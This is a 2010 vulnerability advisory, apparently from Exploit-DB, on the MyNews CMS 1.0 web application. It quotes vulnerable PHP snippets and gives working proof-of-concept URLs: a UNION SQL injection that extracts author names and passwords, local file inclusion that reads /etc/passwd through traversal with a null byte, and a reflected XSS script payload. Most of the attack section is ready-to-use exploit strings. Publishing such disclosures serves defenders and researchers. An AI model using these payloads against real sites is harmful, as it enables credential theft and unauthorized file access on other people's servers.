MyNews CMS 1.0 - SQL Injection / Local File Inclusion / Cross-Site Scripting

EDB-ID:

12637

CVE:



Author:

mr_me

Type:

webapps


Platform:

PHP

Date:

2010-05-17


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

MyNews v1.0 CMS - Sql Injection, local file inclusion and XSS Vulnerabilities
Found by: mr_me - http://net-ninja.net/
Advisory: http://www.corelan.be:8800/advisories.php?id=10-040
Dork: "Corelan Security Team"
Homepage: http://mynews.magtrb.com/
Download: http://mynews.magtrb.com/download.php?fname=upload/Versions/MyNews+v1.0.zip
Greetz: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Notes: 
- Provided 'as is', without any warranty.
- Use for educational purposes only.
- Do not use this to do anything illegal !
- Corelan cannot be held responsible for any damages this may cause.

******************
Sql Injection PoC:
******************

-------[ SNIP ]----------> article.php, line 10
$sql_query = "select id, title, text, views from ".$prefix."_news where id=".$_GET[id]."";
-------[ EOF SNIP ]------>

http://[server]/MyNews/index.php?act=article&id=[ SQLI ]
http://[server]/MyNews/index.php?act=article&id=-12+union+select+1,2,concat(name,0x3a,pwd),4+from+_authors--

********************
File Inclusion PoCs:
********************

-------[ SNIP ]----------> index.php, line 18
if (!isset($_GET['act'])) { $act = 'news'; } else { $act = $_GET['act']; }

include('./includes/header.php');
require('./includes/'.$act.'.php');
-------[ EOF SNIP ]------>

-------[ SNIP ]----------> admin.php, line 65
if(!isset($act)){$act ="index"; }

if($act){include("includes/admin/$act.php");
$smarty->assign("act", $act);
}
-------[ EOF SNIP ]------>

1:
http://[server]/MyNews/index.php?act=[ LFI ]%00&id=12
http://[server]/MyNews/index.php?act=../../../../etc/passwd%00&id=12

2 (requires authentication):
http://[server]/MyNews/admin.php?act=[ LFI ]%00
http://[server]/MyNews/admin.php?act=../../../../etc/passwd%00

*******************
Reflective XSS PoC:
*******************

http://[server]/MyNews/admin.php?act=<script>alert("Found by the Corelan Security Team")</script>